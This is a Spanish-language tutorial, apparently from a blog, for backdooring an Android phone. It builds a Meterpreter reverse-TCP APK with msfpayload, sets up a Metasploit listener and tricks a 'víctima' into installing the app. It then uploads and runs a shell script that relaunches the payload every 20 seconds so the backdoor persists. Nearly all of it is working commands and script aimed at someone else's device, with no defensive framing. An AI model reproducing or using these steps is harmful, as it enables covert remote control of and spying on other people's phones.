Use esta guía para hackear un sistema Android en LAN.
Estaré pirateando WAN, usando una VM.
Vamos a crear un backdoor escribiendo:
msfpayload android/meterpreter/reverse_tcp LHOST="IP" R > abcde.apk
Ahora, configuremos un oyente:
msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST 192.168.0.4
exploit
Después de que el usuario / víctima instala y abre abcde.apk, aparece Meterpreter ...
Paso 2 Crear una secuencia de comandos persistente:
Aquí ... Copie estos comandos en un bloc de notas para crear un script y guárdelo como anything.sh (¡La extensión de archivo .sh es importante!)
--------------------------------------------------------------------------------------------------------(No copie estas líneas “--” también, no hay saltos de línea en la tercera y cuarta línea , son una sola línea )
#!/bin/bash
while true
do am start –user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
sleep 20
done
--------------------------------------------------------------------------------------------------------
(La primera línea #! / bin / bash también es importante ya que reconoce la secuencia de comandos como una secuencia de comandos de shell bash)
(puede configurar la suspensión a cualquier cantidad de segundos que desee que la secuencia de comandos se suspenda)
Mueva / copie esto a la carpeta Inicio / Root de KALI.
--------------------------------------------------------------------------------------------------------
Script actualizado v3 (Compatible con cualquier versión de Android)CRÍTICO: NO COPIE / PEGAR EL ESCRITO DIRECTAMENTE, O ( PUEDE ) NO FUNCIONARÁ /! \.. Supongo que tendrás que escribirlo por tu cuenta ... (No me preguntes por qué ...)Código:--------------------------------------------------------------------------------------------------------
#!/bin/bash
while :
do am start –user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
sleep 20
done
--------------------------------------------------------------------------------------------------------
Hay un 'espacio' entre 'while' y ':'
NO Múltiples espacios en el guión.
NO Salto de línea entre la tercera y cuarta línea. (un total de 5 líneas)
Paso 3 : súbelo al sistema hackeado de Android:
¡Necesitas cargar el script de shell en etc / init.d / para que sea persistente incluso después de reiniciar !
Para hacer esto, navegue al directorio usando los siguientes comandos:
cd /Ahora debe estar en el directorio ROOT , puede verificar escribiendo:
ls
Ahora escriba:
cd etcVerifique nuevamente escribiendo:
ls
Nuevamente cambie el directorio:
cd init.d
ls
Aquí estamos…
Hora de cargar el script de Shell:
Haga esto escribiendo:
upload anything.sh
¿Que? ¡No! ¡Necesitamos acceso raíz para completar este comando! ¡Maldito!
No importa:
Hagamos que la aplicación (es decir, Actividad principal) sea persistente hasta que se reinicie
Sin embargo, no será persistente después de que el sistema Android de la víctima se reinicie.
Para hacer esto, cargue el script en cualquier lugar de la tarjeta sd:
cd /
cd /sdcard/Download
ls
upload anything.sh
¡Hecho! Subido!
Paso 4 Ejecute el script:
Ahora, todo lo que tenemos que hacer es ejecutar el script una vez, y luego todo se hará automáticamente.
Ingrese al shell del sistema escribiendo:
shellAhora, navegue a la ubicación del script:
cd /Ahora es el momento de la EJECUCIÓN:
cd /sdcard/Download
ls
sh anything.sh
¡La Persistencia ha sido activado ! Todo lo que tiene que hacer es presionar ctrl + C para terminar el shell (no se preocupe, el script aún se está ejecutando)
Reinicie para eliminar el script o use Task Killer
Paso 5 Prueba ...
Puede probarlo saliendo de meterpreter y configurando nuevamente un Listener.
¡Debería obtener un indicador de meterpreter automáticamente!
PRUEBA:
La persistencia de la puerta trasera solo permanecerá hasta que se reinicie el sistema Android.
Si está pirateando WAN y tiene una IP pública dinámica, entonces, la persistencia solo permanecerá hasta que su enrutador se reinicie y su IP cambie.
Recuerde reiniciar el Android para eliminar el script en ejecución, si está probando en su propio sistema Android.
Si el sistema Android de la víctima está enraizado y su IP pública es estática, entonces:
- ¡La persistencia permanecerá para siempre en WAN!
- La persistencia permanecerá para siempre en LAN Obviamente











0 Comentarios